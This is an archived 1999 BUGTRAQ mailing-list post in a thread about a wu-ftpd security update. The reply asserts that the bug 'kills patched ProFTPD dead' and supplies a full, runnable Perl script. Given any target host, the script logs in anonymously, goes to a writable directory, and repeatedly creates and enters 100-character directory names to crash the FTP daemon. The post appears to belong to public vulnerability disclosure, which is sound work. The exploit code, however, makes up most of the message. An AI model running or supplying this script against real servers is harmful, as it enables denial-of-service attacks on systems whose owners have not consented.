Pro/wuFTPD DoS (Was: SECURITY: new wu-ftpd packages available (fwd))
Date: Thu, 11 Feb 1999 18:49:37 -0500
From: Ken Williams <jkwilli2@UNITY.NCSU.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available (fwd))
On Thu, 11 Feb 1999, Ronald Wahl wrote:
> Date: Thu, 11 Feb 1999 00:12:04 +0100
> From: Ronald Wahl <rwahl@GMX.NET>
> To: BUGTRAQ@netspace.org
> Subject: Re: SECURITY: new wu-ftpd packages available (fwd)
>
> On Tue, 9 Feb 1999, RHS Linux User wrote:
>
> > ---------- Forwarded message ----------
> > Date: Tue, 9 Feb 1999 18:20:51 -0500 (EST)
> > From: Cynthia Dale <silly@redhat.com>
> > To: cdale@home.isolnet.com
> > Subject: SECURITY: new wu-ftpd packages available (fwd)
> >
> >
> >
> > fnord.
> >
> > ---------- Forwarded message ----------
> > Date: Tue, 9 Feb 1999 17:34:10 -0500
> > From: Bill Nottingham <notting@redhat.com>
> > Reply-To: redhat-watch-list@redhat.com
> > To: redhat-watch-list@redhat.com
> > Subject: SECURITY: new wu-ftpd packages available
> > Resent-Date: 9 Feb 1999 22:56:28 -0000
> > Resent-From: redhat-watch-list@redhat.com
> > Resent-cc: recipient list not shown: ;
> >
> > A security vulnerability has been identified in all versions of the wu-ftpd
> > server binary shipped with Red Hat Linux. For more information, see
> > http://www.netect.com/advisory_0209.html
> >
> > New packages are available for Red Hat Linux 4.2, 5.0, 5.1, and 5.2. All
> > users of Red Hat Linux are encouraged to upgrade to the new wu-ftpd releases
> > immediately. As always, these packages have been signed with the Red Hat PGP
> > key.
>
> Is it possible that the bug is not fixed yet?
>
> mkdir <verylongname> let the deamon do funny things. Can someone reproduce
> this?
>
> ron
>
> --
> \ Ronald Wahl --- rwahl@gmx.net \ Gib Gates keine Chance! /
> \ WWW: http://www.tu-chemnitz.de/~row/ \ /
> \ Talk: rwa@goliath.csn.tu-chemnitz.de \ Pinguine schuetzen. /
> \ PGP key available \ /
>
hi,
yes,
kills patched ProFTPD dead.
-----snip-----
#!/usr/local/bin/perl
# ftpd thingy
# bubba@bubba.org
#
$login="ftp"; #duh
$pass="ftp\@ftp.com"; #ditto
$cdstart="incoming"; #dir with write access to start making new dirs
$length=100; #length of dir names
$numdirs="15"; #number of dirs to create
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
exit;
}
use Socket;
$string="x" x $length;
my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$count=$numdirs;
while ($count--) {
if ($count==$numdirs-1) {
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "cwd $cdstart\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
} elsif ($count==1) {
$msg = "pwd\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "quit\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
} else {
$msg = "mkd $string\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "cwd $string\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pwd\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
}
}
while (<SOCK>) {
print;
}
exit;
-----snip-----
Ken Williams
jkwilli2@csc.ncsu.edu
Packet Storm Security http://packetstorm.genocide2600.com/
Trinux: Linux Security Toolkit http://www.trinux.org/ ftp://ftp.trinux.org
PGP DH/DSS/RSA Public Keys http://packetstorm.genocide2600.com/pgpkey/
E.H.A.P. VP & Head of Operations http://www.ehap.org/ tattooman@ehap.org
NCSU Computer Science http://www.csc.ncsu.edu/ jkwilli2@csc.ncsu.edu
